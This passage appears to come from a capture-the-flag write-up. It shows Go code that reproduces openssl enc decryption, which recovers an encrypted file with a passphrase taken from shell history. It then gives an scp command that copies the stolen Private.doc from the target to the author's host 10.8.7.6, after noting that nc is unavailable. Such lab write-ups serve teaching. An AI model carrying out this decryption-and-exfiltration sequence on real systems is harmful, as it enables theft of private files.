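// D1 = MD5(pass||salt), Dn = MD5(Dn-1||pass||salt), until keyLen+ivLen bytes.
func evpBytesToKey(pass, salt []byte, keyLen, ivLen int) (key, iv []byte) {
	var out, prev []byte
	for len(out) < keyLen+ivLen {
		d := md5.Sum(append(append(append([]byte{}, prev...), pass...), salt...))
		prev = d[:]
		out = append(out, prev...)
	}
	return out[:keyLen], out[keyLen : keyLen+ivLen]
}

// PKCS#7 padding as applied by openssl enc in CBC mode: always 1..16 bytes.
func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad expects len(b) to be a positive multiple of the block size.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptEnc mirrors `openssl enc -aes-256-cbc -md md5 -pass pass:<pass>`
// with an explicit salt: "Salted__" || salt || AES-256-CBC(PKCS#7(plain)).
func EncryptEnc(plain, pass, salt []byte) ([]byte, error) {
	if len(salt) != 8 {
		return nil, errors.New("salt must be 8 bytes")
	}
	key, iv := evpBytesToKey(pass, salt, 32, aes.BlockSize)
	block, _ := aes.NewCipher(key) // key is always 32 bytes, so this cannot fail
	ct := pkcs7Pad(append([]byte{}, plain...))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, ct) // in-place is allowed
	return append(append([]byte(saltedMagic), salt...), ct...), nil
}

// DecryptEnc reads the header, re-derives key and IV from the passphrase and
// decrypts: the salt is public, so the passphrase alone unlocks the file.
func DecryptEnc(data, pass []byte) ([]byte, error) {
	if len(data) < 16 || string(data[:8]) != saltedMagic {
		return nil, errors.New("missing Salted__ header")
	}
	salt, ct := data[8:16], data[16:]
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext not block aligned")
	}
	key, iv := evpBytesToKey(pass, salt, 32, aes.BlockSize)
	block, _ := aes.NewCipher(key)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

func main() {
	// Constructed sample values; a fixed salt keeps the output reproducible.
	salt := []byte{1, 2, 3, 4, 5, 6, 7, 8}
	enc, _ := EncryptEnc([]byte("constructed secret document"), []byte("nostradamus"), salt)
	dec, err := DecryptEnc(enc, []byte("nostradamus"))
	fmt.Printf("%q %v\n", dec, err)
}
```

A file produced by this program decrypts with `openssl enc -aes-256-cbc -d -md md5 -pass pass:nostradamus`, and vice versa, which is the interoperability that makes the history entry sufficient to recover Private.doc.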

As nc is not available, let's use scp to transfer the decrypted file to our local machine.

[tskies@loophole]$  scp Private.doc root@10.8.7.6:/root/
The authenticity of host '10.8.7.6 (10.8.7.6)' can't be established.
RSA key fingerprint is 94:80:fb:43:15:89:e3:7f:fb:eb:b4:39:e3:78:67:fa.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.8.7.6' (RSA) to the list of known hosts.
root@10.8.7.6's password:
Private.doc 100% 381KB 381.0KB/s 00:00
[tskies@loophole]$

The contents of the file are as follows

The document has been successfully obtained.

Happy Hacking !!!